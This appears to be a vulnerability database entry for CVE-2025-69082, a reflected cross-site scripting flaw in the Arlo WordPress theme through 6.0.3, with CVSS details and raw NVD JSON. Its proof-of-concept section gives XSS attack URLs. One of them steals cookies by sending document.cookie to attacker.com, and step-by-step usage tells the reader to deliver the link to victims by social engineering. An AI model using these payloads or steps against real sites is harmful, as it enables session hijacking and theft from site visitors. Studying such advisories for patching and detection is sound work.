Security Vulnerability Report
中文
CVE-2025-69082 CVSS 7.1 HIGH

CVE-2025-69082

Published: 2026-01-07 12:17:06
Last Modified: 2026-04-23 15:36:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frenify Arlo arlo allows Reflected XSS.This issue affects Arlo: from n/a through <= 6.0.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Arlo WordPress主题 <= 6.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69082 PoC: WordPress Arlo Theme Reflected XSS --> <!-- Target: WordPress sites using Arlo theme <= 6.0.3 --> <!-- Attack Type: Reflected Cross-Site Scripting --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69082 PoC - Arlo Theme XSS</title> </head> <body> <h2>CVE-2025-69082 WordPress Arlo Theme Reflected XSS PoC</h2> <h3>Attack URL:</h3> <p>Replace VICTIM_DOMAIN with the target domain</p> <!-- Basic XSS PoC --> <pre> http://VICTIM_DOMAIN/?[PARAM]=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E </pre> <!-- Cookie Stealing PoC --> <pre> http://VICTIM_DOMAIN/?[PARAM]=%3Cscript%3Edocument.location=%27https://attacker.com/steal?c=%27%2Bdocument.cookie%3C/script%3E </pre> <!-- Event Handler Based XSS --> <pre> http://VICTIM_DOMAIN/?[PARAM]=%22%3E%3Cimg%20src=x%20onerror=alert(%27XSS%27)%3E </pre> <h3>Usage:</h3> <ol> <li>Replace VICTIM_DOMAIN with the target website URL</li> <li>Replace [PARAM] with the vulnerable parameter name</li> <li>Send the crafted URL to the victim via social engineering</li> <li>When victim clicks the link, XSS payload will execute</li> </ol> <h3>Detection:</h3> <p>Check for unescaped user input in page source code</p> <script> // Demo payload for testing in controlled environment console.log('CVE-2025-69082 PoC loaded'); console.log('This PoC demonstrates reflected XSS vulnerability'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69082", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:06.277", "lastModified": "2026-04-23T15:36:19.620", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frenify Arlo arlo allows Reflected XSS.This issue affects Arlo: from n/a through <= 6.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/arlo/vulnerability/wordpress-arlo-theme-6-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}